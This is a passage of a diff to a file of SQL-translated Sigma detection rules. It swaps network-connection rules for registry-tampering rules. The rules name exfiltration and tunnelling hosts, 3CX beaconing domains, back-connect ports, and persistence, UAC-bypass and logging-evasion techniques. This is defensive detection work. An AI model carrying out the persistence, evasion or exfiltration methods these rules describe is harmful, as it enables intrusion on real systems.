'%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", - "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "status": "test", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1203" - ], - "falsepositives": [ - "Unknown" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion" ], "falsepositives": [ - "Web Browsers" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate driver altitude change to hide sysmon" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "Suspicious Typical Malware Back Connect Ports", - "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "status": "test", - "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((NewProcessName LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_malware_backconnect_ports.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "status": "experimental", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "Excel Network Connections", - "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "status": "experimental", - "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "net_connection_win_excel_outbound_network_connection.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", - "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '3389' AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_mal_adwind.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", - "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "status": "test", + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Disk Cleanup Handler - Autorun", + "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND 